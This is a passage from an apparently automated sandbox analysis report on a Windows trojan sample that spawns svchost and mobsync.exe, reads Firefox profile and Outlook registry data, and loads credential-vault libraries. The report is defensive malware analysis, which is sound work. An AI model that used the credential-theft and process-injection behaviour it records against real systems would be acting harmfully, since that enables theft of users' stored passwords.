                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CBB2A2_2_033CBB2A
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CBB172_2_033CBB17
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D419A2_2_033D419A
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CD9FA2_2_033CD9FA
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CD7DA2_2_033CD7DA
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033EC68A2_2_033EC68A
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D5EF62_2_033D5EF6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ECE4F63_2_04ECE4F6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED24463_2_04ED2446
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC44203_2_04EC4420
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE05913_2_04EE0591
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E205353_2_04E20535
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3C6E03_2_04E3C6E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E1C7C03_2_04E1C7C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E207703_2_04E20770
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E447503_2_04E44750
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EB20003_2_04EB2000
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED81CC3_2_04ED81CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE01AA3_2_04EE01AA
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED41A23_2_04ED41A2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EA81583_2_04EA8158
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E101003_2_04E10100
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBA1183_2_04EBA118
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EA02C03_2_04EA02C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC02743_2_04EC0274
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE03E63_2_04EE03E6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2E3F03_2_04E2E3F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDA3523_2_04EDA352
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E10CF23_2_04E10CF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC0CB53_2_04EC0CB5
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E20C003_2_04E20C00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E1ADE03_2_04E1ADE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E38DBF3_2_04E38DBF
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2AD003_2_04E2AD00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBCD1F3_2_04EBCD1F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDEEDB3_2_04EDEEDB
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E32E903_2_04E32E90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDCE933_2_04EDCE93
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E20E593_2_04E20E59
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDEE263_2_04EDEE26
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E12FC83_2_04E12FC8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E9EFA03_2_04E9EFA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E94F403_2_04E94F40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E62F283_2_04E62F28
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E40F303_2_04E40F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC2F303_2_04EC2F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E4E8F03_2_04E4E8F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E068B83_2_04E068B8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E228403_2_04E22840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2A8403_2_04E2A840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E229A03_2_04E229A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EEA9A63_2_04EEA9A6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E369623_2_04E36962
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E1EA803_2_04E1EA80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED6BD73_2_04ED6BD7
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDAB403_2_04EDAB40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E114603_2_04E11460
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDF43F3_2_04EDF43F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE95C33_2_04EE95C3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBD5B03_2_04EBD5B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED75713_2_04ED7571
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED16CC3_2_04ED16CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E656303_2_04E65630
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDF7B03_2_04EDF7B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED70E93_2_04ED70E9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDF0E03_2_04EDF0E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ECF0CC3_2_04ECF0CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E270C03_2_04E270C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2B1B03_2_04E2B1B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EEB16B3_2_04EEB16B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E5516C3_2_04E5516C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E0F1723_2_04E0F172
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC12ED3_2_04EC12ED
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3D2F03_2_04E3D2F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3B2C03_2_04E3B2C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E252A03_2_04E252A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E6739A3_2_04E6739A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E0D34C3_2_04E0D34C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED132D3_2_04ED132D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFCF23_2_04EDFCF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E99C323_2_04E99C32
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3FDC03_2_04E3FDC0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED7D733_2_04ED7D73
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E23D403_2_04E23D40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED1D5A3_2_04ED1D5A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E29EB03_2_04E29EB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04DE3FD53_2_04DE3FD5
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04DE3FD23_2_04DE3FD2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFFB13_2_04EDFFB1
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E21F923_2_04E21F92
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFF093_2_04EDFF09
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E238E03_2_04E238E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E8D8003_2_04E8D800
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E299503_2_04E29950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3B9503_2_04E3B950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EB59103_2_04EB5910
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ECDAC63_2_04ECDAC6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E65AA03_2_04E65AA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBDAAC3_2_04EBDAAC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC1AA33_2_04EC1AA3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E93A6C3_2_04E93A6C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFA493_2_04EDFA49
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED7A463_2_04ED7A46
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E95BF03_2_04E95BF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E5DBF93_2_04E5DBF9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3FB803_2_04E3FB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFB763_2_04EDFB76
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E91CB03_2_02E91CB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8CB803_2_02E8CB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8AEC43_2_02E8AEC4
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8AED03_2_02E8AED0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8CDA03_2_02E8CDA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8AD803_2_02E8AD80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E953403_2_02E95340
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E935403_2_02E93540
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02EABA303_2_02EABA30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E50B3_2_04C7E50B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E7413_2_04C7E741
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E2883_2_04C7E288
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E3A33_2_04C7E3A3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C8533C3_2_04C8533C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7D8083_2_04C7D808
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7CA983_2_04C7CA98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: String function: 007C7DE1 appears 35 times
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: String function: 007E0AE3 appears 70 times
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: String function: 007E8900 appears 42 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E0B970 appears 262 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E8EA12 appears 86 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E55130 appears 58 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E9F290 appears 103 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E67E54 appears 107 times
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667492083.00000000038BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs YH-3-12-2024-GDL Units - Projects.exe
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666420188.0000000003713000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs YH-3-12-2024-GDL Units - Projects.exe
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@12/10
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082A06A GetLastError,FormatMessageW,0_2_0082A06A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008181CB AdjustTokenPrivileges,CloseHandle,0_2_008181CB
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008187E1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0082B3FB
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0083EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0083EE0D
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0082C397
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007C4E89
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeFile created: C:\Users\user\AppData\Local\Temp\aut12E8.tmpJump to behavior
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003262000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.2049691866.0000000003262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: YH-3-12-2024-GDL Units - Projects.exeReversingLabs: Detection: 31%
                Source: YH-3-12-2024-GDL Units - Projects.exeVirustotal: Detection: 33%
                Source: unknownProcess created: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"Jump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic file information: File size 1213952 > 1048576
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zZyhwwvEVl.exe, 00000002.00000000.1787718772.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3502520360.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
